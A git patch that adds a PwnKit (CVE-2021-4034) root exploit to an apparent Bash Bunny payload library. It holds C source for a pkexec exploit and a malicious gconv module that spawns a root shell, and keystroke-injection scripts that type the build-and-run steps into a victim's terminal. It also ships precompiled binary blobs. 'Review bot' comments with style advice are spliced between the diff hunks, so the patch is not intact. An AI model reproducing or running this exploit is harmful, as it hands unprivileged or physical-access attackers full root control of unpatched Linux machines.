From c06fd4aa807a14b1a68b0dfaf1ecb089c5da6685 Mon Sep 17 00:00:00 2001 
From: TW-D <75358550+TW-D@users.noreply.github.com> Date: Sat, 29 Jan 2022 12:26:56 -0500 Subject: [PATCH] Add "PwnKit Vulnerability" - LPE (#489) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Add "PwnKit Vulnerability" - LPE The Qualys Research Team has discovered a memory corruption vulnerability in polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution. * Add Credits to README.MD * pwnkit: Move to shorter directory name * pwnkit: Add compiled version * pwnkit: Copy built binaries instead of compiling * make it executable * add credits Co-authored-by: Marc --- .../PwnKit_LPE/CVE-2021-4034_files/exploit.c | 21 ++++ .../PwnKit_LPE/CVE-2021-4034_files/library.c | 24 ++++ .../library/execution/PwnKit_LPE/README.md | 26 ++++ .../library/execution/PwnKit_LPE/payload.txt | 112 +++++++++++++++++ .../CVE-2021-4034_files/exploit.c | 21 ++++ .../CVE-2021-4034_files/library.c | 24 ++++ .../CVE-2021-4034_files/pwnkit | Bin 0 -> 16144 bytes .../CVE-2021-4034_files/pwnkit.so | Bin 0 -> 15592 bytes .../execution/PwnKit_LPE_Compiled/README.md | 28 +++++ .../execution/PwnKit_LPE_Compiled/payload.txt | 116 ++++++++++++++++++ 10 files changed, 372 insertions(+) create mode 100644 payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/exploit.c create mode 100644 payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/library.c create mode 100644 payloads/library/execution/PwnKit_LPE/README.md create mode 100644 payloads/library/execution/PwnKit_LPE/payload.txt create mode 100644 payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/exploit.c create mode 100644 payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/library.c create mode 100755 payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit create mode 100755 payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit.so create mode 100644 
payloads/library/execution/PwnKit_LPE_Compiled/README.md
create mode 100644 payloads/library/execution/PwnKit_LPE_Compiled/payload.txt
diff --git a/payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/exploit.c b/payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/exploit.c
new file mode 100644
index 00000000..7df10400
--- /dev/null
+++ b/payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/exploit.c
@@ -0,0 +1,21 @@
+#include
+
+int main() {
+
+ char * const ARGUMENTS[] = {
+ NULL
+ };
+
+ char * const ENVIRONMENT[] = {
+ "pwnkit.so:.",
+ "PATH=GCONV_PATH=.",
+ "SHELL=PWNKIT",
+ "CHARSET=PWNKIT",
+ NULL
+ };
+
+ execve("/usr/bin/pkexec", ARGUMENTS, ENVIRONMENT);
+
+ return(0);
+
+}
\ No newline at end of file
diff --git a/payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/library.c b/payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/library.c
new file mode 100644
index 00000000..4dadea26
--- /dev/null
+++ b/payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/library.c
@@ -0,0 +1,24 @@
+#include
+#include
+#include
+
+void gconv() {}
+
+void gconv_init() {
+
+ char * const ARGUMENTS[] = {
+ "/bin/sh",
+ NULL
+ };
+
+ char * const ENVIRONMENT[] = {
+ "PATH=/bin:/sbin:/usr/bin:/usr/sbin/",
+ NULL
+ };
+
+ setuid(0);
+ setgid(0);
+ execve(ARGUMENTS[0], ARGUMENTS, ENVIRONMENT);
+ exit(0);
+
+}
\ No newline at end of file
diff --git a/payloads/library/execution/PwnKit_LPE/README.md b/payloads/library/execution/PwnKit_LPE/README.md
new file mode 100644
index 00000000..f6649bf9
--- /dev/null
+++ b/payloads/library/execution/PwnKit_LPE/README.md
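Review bot: `exploit.c` is committed byte-identical (blob `7df10400`) both here and under `PwnKit_LPE_Compiled/CVE-2021-4034_files/`, as is `library.c` (blob `4dadea26`), with nothing saying which copy is authoritative, so the pair will drift the first time one of them is edited; the same applies to the two `_Compiled` source hunks later in this patch. The file also lacks a header comment: the `ENVIRONMENT` strings (`"pwnkit.so:."`, `"PATH=GCONV_PATH=."`, `"CHARSET=PWNKIT"`) are only meaningful together with the `module UTF-8// PWNKIT// pwnkit 1` line and the `GCONV_PATH=.` directory that `payload.txt` creates, and that coupling is stated nowhere, so a comment such as `/* CVE-2021-4034 (Qualys advisory linked in README.md); the names below must match the gconv-modules line and directory layout created by payload.txt */` would save the next maintainer a trip through both files. Two style nits: `int main()` should be `int main(void)`, and `return(0);` is conventionally `return 0;`. The `#include` line as rendered has no header name, presumably because the patch viewer dropped the angle-bracketed part, so check the file in the repository rather than this view.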
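Review bot: `void gconv() {}` and `void gconv_init() {` use empty parentheses, which in C11 are old-style non-prototype declarations rather than "takes no arguments"; write `void gconv(void) {}` and `void gconv_init(void) {` so the compiler can check calls. These two names are presumably the entry points the iconv module loader looks up once the `gconv-modules` line written by `payload.txt` names `pwnkit`, so a one-line comment above them stating that they form an external interface and must not be renamed would protect them from a well-meaning cleanup. Minor consistency point: the last `PATH` component `/usr/sbin/` carries a trailing slash the other entries do not. The three `#include` lines are rendered without header names, which looks like the viewer stripping angle brackets rather than a defect in the file.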
@@ -0,0 +1,26 @@
+# PwnKit Vulnerability - Local Privilege Escalation
+
+- Title: PwnKit Vulnerability - Local Privilege Escalation
+- Author: TW-D
+- Version: 1.0
+- Target: Linux
+- Category: Execution
+- Credits: Qualys Research Team
+
+## Description
+
+The Qualys Research Team has discovered a memory corruption vulnerability in polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution. This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration.
+
+[PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034)
+
+## Configuration
+
+From "payload.txt" change the values of the following constant :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+
+```
diff --git a/payloads/library/execution/PwnKit_LPE/payload.txt b/payloads/library/execution/PwnKit_LPE/payload.txt
new file mode 100644
index 00000000..fc5db15a
--- /dev/null
+++ b/payloads/library/execution/PwnKit_LPE/payload.txt
@@ -0,0 +1,112 @@
+#!/bin/bash
+#
+# Title: PwnKit Vulnerability - Local Privilege Escalation
+#
+# Description:
+# The Qualys Research Team has discovered a memory corruption
+# vulnerability in polkit’s pkexec, a SUID-root program that
+# is installed by default on every major Linux distribution.
+#
+# Author: TW-D
+# Version: 1.0
+# Category: Execution
+# Target: Linux
+# Attackmodes: HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Ubuntu 20.04.3 LTS x86_64
+# pkexec version 0.105
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Yellow quadruple blink .......................... STAGE4
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 7000
+RUN UNITY xterm
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING "cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/CVE-2021-4034_files/"
+Q ENTER
+Q DELAY 3500
+
+Q STRING "mkdir /tmp/pwnkit_lpe/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING "echo \"module UTF-8// PWNKIT// pwnkit 1\" > /tmp/pwnkit_lpe/gconv-modules"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "mkdir -p \"/tmp/pwnkit_lpe/GCONV_PATH=.\""
+Q ENTER
+Q DELAY 1500
+
+Q STRING "cp /usr/bin/true \"/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:.\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE4
+
+Q STRING "cd /tmp/pwnkit_lpe/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "/usr/bin/pkexec --version"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "./pwnkit"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "id"
+Q ENTER
+Q DELAY 1500
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0
\ No newline at end of file
diff --git a/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/exploit.c b/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/exploit.c
new file mode 100644
index 00000000..7df10400
--- /dev/null
+++ b/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/exploit.c
@@ -0,0 +1,21 @@
+#include
+
+int main() {
+
+ char * const ARGUMENTS[] = {
+ NULL
+ };
+
+ char * const ENVIRONMENT[] = {
+ "pwnkit.so:.",
+ "PATH=GCONV_PATH=.",
+ "SHELL=PWNKIT",
+ "CHARSET=PWNKIT",
+ NULL
+ };
+
+ execve("/usr/bin/pkexec", ARGUMENTS, ENVIRONMENT);
+
+ return(0);
+
+}
\ No newline at end of file
diff --git a/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/library.c b/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/library.c
new file mode 100644
index 00000000..4dadea26
--- /dev/null
+++ b/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/library.c
@@ -0,0 +1,24 @@
+#include
+#include
+#include
+
+void gconv() {}
+
+void gconv_init() {
+
+ char * const ARGUMENTS[] = {
+ "/bin/sh",
+ NULL
+ };
+
+ char * const ENVIRONMENT[] = {
+ "PATH=/bin:/sbin:/usr/bin:/usr/sbin/",
+ NULL
+ };
+
+ setuid(0);
+ setgid(0);
+ execve(ARGUMENTS[0], ARGUMENTS, ENVIRONMENT);
+ exit(0);
+
+}
\ No newline at end of file
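Review bot: The `######## CLEANUP ########` section only runs `sync` and `udisk unmount`, i.e. it tidies the Bash Bunny, while everything the `STAGE2`–`STAGE4` keystrokes created on the host — `/tmp/pwnkit_lpe/` with the compiled `pwnkit` and `pwnkit.so`, `gconv-modules`, the `GCONV_PATH=.` directory and the copied `/usr/bin/true` — remains on the target after the run, and the header comment does not mention it. The `# STATUS` header should state plainly that host-side artifacts are left under `/tmp/pwnkit_lpe/`, e.g. `# NOTE: leaves /tmp/pwnkit_lpe/ (binaries, gconv-modules, GCONV_PATH=. dir) on the host; clean up after a lab run`, so anyone testing this knows what to expect and what to look for; the `PwnKit_LPE_Compiled/payload.txt` hunk at the end of this patch has the same gap. A second documentation point: every step is typed blind with fixed `Q DELAY` values and nothing observes whether `gcc` or `pkexec` did what was expected, so the `# TESTED ON` block (Ubuntu 20.04.3, pkexec 0.105) should say explicitly that the timings and the step sequence were calibrated for that environment only.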
diff --git a/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit b/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit new file mode 100755 index 0000000000000000000000000000000000000000..787f73d8eb0a2eee48383070e077774166e4442b GIT binary patch literal 16144 zcmeHOZ)_Y#6`woDi9_nMliI~3BtF_ia$5Opr-^Y>x!JRQ_8z%7hhsMdl5W>`Yx|V@ zWA64+J3?S&TIC1^3keWXAVER`fsk791;Ga#xk_5`B@v=B1yrlF;FQvu&=!Z19PiD( zcivm<0{zf_*^%~sGr#wKGqZ1J*R$T4FN7k!UXMp`st^weEJbTAMj^xO$0-A#hz?N= zzq`avu@TA}Bxl(b3&3in1#dZ45nlm_x(3XwfgiPK!N@&CMBRF696JPwQP6pyt`ZGY zcA`Q3WMq4(JwJ*e`Q>j3A43O7jCLJ%WvN-3#ZqTEMyb6=2w8_k)UA+ig>;OI)E*

d9_Zh~}9>>+kiJ0<3jW4%Xs%F13UgNsb)TL%Y*9rgOn-;Wh8ZRvRR{Mm2cb9n!+<}YmeCHmlb zV4diL2{}ACp^Xpb{ulf-IQiFb#JaYv!8fhLqwiY&r-Apw;Y?2e;dhcy{s?j-36^cV{eD}q@te4Ezy`%CAV;^7B>XnsK3*+v_t%Yp8v!>0 zZUo#2xDjw8;6~tsiooA%cKuVGeyvJ9SNYo(A=D@4OmFe3I{i%5yzEl(z)L_E_q+_h zHH`}7usnvg>x)H5dtSgYPC2h%g(BA1_SbOX+M{aWC3X7c<>+8!rt(i8>^H6K0%X5qWfviP!OAXyX4%pVfph3twQw1%v(kEH>C3l^ z#h*#@xuKP~dS9Jv&8%F~!SI}|tMa_Df5GFCna+3a6C(I%C|r0eI2bJaYe=1G zehuhjk-fKY3@p8It5{So-KsDf+kQv!judW03a|GR{v0gUy{Jyld(;R1kbf1&$7fCk zPXtc}9}Q~um|%N2auDUXDvc!UvYXrpxDjw8;6}iWfExif0&WD{2)Ge&Bj85hgNgut zuNr?meJWwXx3Yr)5e*KioqgR$`ybY1HXx3vp-7}Ndc6N|cu;h!!GU9;K`yrBbJ>>R zM7m}C6n>V2lkn`Qco4tc;y0zMZxoC2KLyLhB7X0>2{;Ql`?q58DL`?fSX@Dbgx^9j zdCm+7&qS?f#~quhX5rrj$m1G-A3|OD(k^;7)gtVM1KW8F_*Nu*wY|QEPtW$uMXaTAN>T_@`fZafQudnuN-mtIXs}&)i ze`Z6-*YuUj9$)K|8&zM&^rk+alJ<23eXT)XQ0ZUo#2xDjw8@P0<1w60LTJ*}=0#I=f;?y#V=a1jJ7s>u1ixw9M zw-7cE))O+2ObEqdcrBuQHw22`FL~|ahe@bV!^}@n$GG2fjaN)%PPc^kimNR{$l>?(*MrV{lfgykokYk>ld<~ zZQ{hoxQ10+tDfhi`Og37=L@o)df~j@eeLnM>As`+BcaOr1g^R#@ z@hRenb0hHEAU;ugj_`fo0=&Px3R$`+`3BLXlp7BNUn?3)*M+Tnf#2q>5&WEDegJtc z*f6yYe{LQAyTD_+&i?!uc)zV)&i)+ut=FblQLIh zVmz6Vz02mFrLkf8(DMGMh)i^us0_W zCo0$#ZpMKZK=&~{Hzoq{$uu-!p_#QTr;Thbkx7>oG_Yljq>cj0jVDbJkS886jS0x( zfCF1bUZ8+6Mnh~Y4q7f*3Tv!c3eH2tdMXivRx?l+`~+kJR%H-a5r83|f{|Rhsor}A z=Vfqf!?V~*4fJ=Fk>_P(mcE=vyax{ZUXBjZGb-q0OFU0vsvR$$$4IP^R(VdVEJ_IHlopOU`RjGsIS`>Dv_)LZk# z)$11}9V31-vnQt>=Z_daZvU*`@@8DHiltw^eoXutGO$op-UG<-yps1{I{mrK_#$X( zYA9cW1#Y)g1~GEnf1clUklyK!ZP`;bwNLIP z6YHIGYS!D4$4*HMnJ87bOdZ4LFuvn)fB5;i8944cWJ^h*f!pDzoZDqboaU~jpTIv% LknVB_97XYOwH|bk literal 0 HcmV?d00001 
diff --git a/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit.so b/payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit.so new file mode 100755 index 0000000000000000000000000000000000000000..2254beeb23004979438655c3543e82f1a7e308fc GIT binary patch literal 15592 zcmeHOYit}>6~4Q1TDP@hwk7jALz2o6SUcc(R1W^UY2-a+AVgVVZXP;FH8@KAE>ScVdviQGyh4x zG4VTMnZRL+JfO(;aq^Q(D>Hh3(k|+8$=B#QY)U;rMb!1QC#LIMm$MlrGeq2ZH+|kELYiE5DxD}56DQQE zk<o_wVHL(iD$B5}C?%KNf(x#Q{!T1&WmpYi?cmhDYE4NgT_wtlL7>jb$zW zm}Or2ZoEdaeW~|N0_;mWf5_ziYyKWe{V4O4`liZS+kr*0RVzZt{%hL)_?MX6y=7nA zw6FZ(q9zxd+x~ohi@lSiR^?-p_J!U!v-ZVz{8oFZ z_XG)*J)87yzn-SaUEO(vfY{?J(}}hNpW|t$mFaDs&!6LM%#iIQ#dz-V6(&@_?u@L=}iC5LFZGEp&$q?O5 zl;4>7H&-69r^Z!mzCE_T<;Ldc=)VJp2)mO$uaVyv8|-Qy-qrC)+bvHvFRGLK9{k9$ zLkAgVn?d?~bF)&>zfbk;YJVm^(0W5Z1tPqIKAi7a((B(Op(iXFQ3aw3L=}iC5LFGQYd=*k_1B zeR6{2QIu*L9qB^%DybwrRaMFOxd1S{1%euzsDGnA)pQci_t!|9}c#$2YY>n>u1? zrh51laU2Krfnr_bdlbGWz+a~mi!1t;h3daW1{RD0bRXH*>p#DT@Ot(SY5VK@&-)w1 znQVYh6J9U=Vgvgx6Mir-Z?Lau`xbRw-+S8gOMaQULDFiw-QDr?PMRCuOVk&iDLON` z;#4Zq68#Oq6x z@QRs~pHc~TR<87HhI}Cz4|BCFst}(+!3D`oE?8 z9Oq|YTmm)P&xAa9oyUsz#rK2#02x>`3#D6FziuB z$S;V0wf>f9gz|o_;6VL>eVZ804}Uz@K@Y)DXgI%FKWzJtS;i1_QT#x{`M*yJUW;L! ziuFDA@rCUngYtT$E#Qy!e+U0zpaDB0ZOg!aK?=TikRR(E?8{u1>nF?hYCK%WUz0DJ zz#sdy*18C!Vd>-c0eL}xN2;K|N{Vf_p*)-%ox|!rY0ij?QC- X{Vo!TCL}6;y{zZ|oBQfJg#G^o^{lU8 literal 0 HcmV?d00001 diff --git a/payloads/library/execution/PwnKit_LPE_Compiled/README.md b/payloads/library/execution/PwnKit_LPE_Compiled/README.md new file mode 100644 index 00000000..87f948c5 --- /dev/null +++ b/payloads/library/execution/PwnKit_LPE_Compiled/README.md 
@@ -0,0 +1,28 @@
+# PwnKit Vulnerability - Local Privilege Escalation - Compiled
+
+- Title: PwnKit Vulnerability - Local Privilege Escalation
+- Author: TW-D
+- Version: 1.0
+- Target: Linux
+- Category: Execution
+- Credits: Qualys Research Team
+
+## Description
+
+This is a version of the PwnKit Vulnerability Local Privilege Escalation containing pre-compiled binaries for x86_64 Linux. If you don't want to use the pre-compiled binaries or you are targetting a different architecture, please find the `PwnKit-LPE` directory.
+
+The Qualys Research Team has discovered a memory corruption vulnerability in polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution. This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration.
+
+[PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034)
+
+## Configuration
+
+From "payload.txt" change the values of the following constant :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+
+```
diff --git a/payloads/library/execution/PwnKit_LPE_Compiled/payload.txt b/payloads/library/execution/PwnKit_LPE_Compiled/payload.txt
new file mode 100644
index 00000000..fec96d9c
--- /dev/null
+++ b/payloads/library/execution/PwnKit_LPE_Compiled/payload.txt
@@ -0,0 +1,116 @@
+#!/bin/bash
+#
+# Title: PwnKit Vulnerability - Local Privilege Escalation
+#
+# Description:
+# The Qualys Research Team has discovered a memory corruption
+# vulnerability in polkit’s pkexec, a SUID-root program that
+# is installed by default on every major Linux distribution.
+#
+# Author: TW-D
+# Version: 1.0
+# Category: Execution
+# Target: Linux
+# Attackmodes: HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Ubuntu 20.04.3 LTS x86_64
+# pkexec version 0.105
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Yellow quadruple blink .......................... STAGE4
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 7000
+RUN UNITY xterm
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING "cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/CVE-2021-4034_files/"
+Q ENTER
+Q DELAY 3500
+
+Q STRING "mkdir /tmp/pwnkit_lpe/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "cp pwnkit.so /tmp/pwnkit_lpe/pwnkit.so"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "cp pwnkit /tmp/pwnkit_lpe/pwnkit"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING "echo \"module UTF-8// PWNKIT// pwnkit 1\" > /tmp/pwnkit_lpe/gconv-modules"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "mkdir -p \"/tmp/pwnkit_lpe/GCONV_PATH=.\""
+Q ENTER
+Q DELAY 1500
+
+Q STRING "cp /usr/bin/true \"/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:.\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE4
+
+Q STRING "cd /tmp/pwnkit_lpe/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "/usr/bin/pkexec --version"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "chmod +x ./pwnkit"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "./pwnkit"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "id"
+Q ENTER
+Q DELAY 1500
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0
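Review bot: `cp pwnkit.so /tmp/pwnkit_lpe/pwnkit.so`, `cp pwnkit /tmp/pwnkit_lpe/pwnkit` and the later `./pwnkit` run two ELF blobs checked in by this same patch (`787f73d8…`, `2254beeb…`) that nothing ties to the `exploit.c`/`library.c` sitting next to them: no digest, no compiler or toolchain record, and the compiled README gives no build command. Since these binaries are what actually executes on the target, a reviewer or user should be able to rebuild and compare; at minimum the script header should record the `gcc -shared -o … -fPIC ./library.c` and `gcc ./exploit.c -o …` invocations from `PwnKit_LPE/payload.txt` together with the distribution and gcc version used, or the README should point to them. The header block is otherwise copied verbatim from the uncompiled variant, so it also omits that the shipped binaries are x86_64-only, which the README does state but the `# TESTED ON` / `# Target` lines do not.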